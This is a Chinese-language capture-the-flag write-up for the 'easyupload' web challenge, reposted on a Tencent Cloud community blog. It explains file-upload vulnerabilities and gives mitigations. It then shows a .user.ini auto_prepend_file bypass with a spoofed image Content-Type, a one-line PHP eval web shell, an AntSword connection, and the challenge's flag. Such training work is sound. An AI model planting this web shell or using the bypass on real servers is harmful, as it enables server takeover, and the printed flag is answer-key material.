前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【愚公系列】2023年05月 攻防世界-Web(easyupload)

【愚公系列】2023年05月 攻防世界-Web(easyupload)

作者头像
愚公搬代码
发布2023-05-24 10:13:12
1.2K0
发布2023-05-24 10:13:12
举报
文章被收录于专栏:历史专栏

前言

文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过服务器的安全机制,向服务器上传含有恶意代码的文件,从而实现对服务器的攻击。

攻击者可以通过文件上传漏洞,上传包含木马、病毒、WebShell等恶意代码的文件,进而获取服务器的控制权。攻击者可以利用这些恶意文件进行各种攻击,如窃取敏感数据、修改网站内容、加密勒索等。

要避免文件上传漏洞,可以采取以下措施:

  • 对上传文件的类型和大小进行限制,并对上传的文件进行检查和过滤;
  • 对上传文件的存储路径进行限制,并且不要使用可执行文件的存储路径;
  • 对上传文件的名称进行限制,避免使用易受攻击的名称;
  • 对上传文件的权限进行限制,避免上传文件的权限过高;
  • 对上传文件的访问进行限制,避免上传文件的访问权限过高。

以上措施可以有效地避免文件上传漏洞的发生,保障服务器的安全。

user.ini文件是PHP的配置文件之一,它可以被用来配置PHP的设置,如内存限制和上传文件的大小限制等。该文件通常位于网站的根目录下。

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制。

一、easyupload

1.题目

在这里插入图片描述
在这里插入图片描述

2.答题

打开连接

在这里插入图片描述
在这里插入图片描述

先是上传.user.ini,并对Content-Type: image/jpeg进行修改

代码语言:javascript
复制
GIF89a
auto_prepend_file=a.jpg

上传成功

在这里插入图片描述
在这里插入图片描述

再上传a.jpg,这个直接就能上传成功

代码语言:javascript
复制
GIF89a
<?=eval($_POST['cmd']);?> 
在这里插入图片描述
在这里插入图片描述

蚁剑连接

在这里插入图片描述
在这里插入图片描述

找flag:cyberpeace{5381ebd202141d71986cc6eeeb0d4763}

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023/05/23 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 一、easyupload
    • 1.题目
      • 2.答题
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档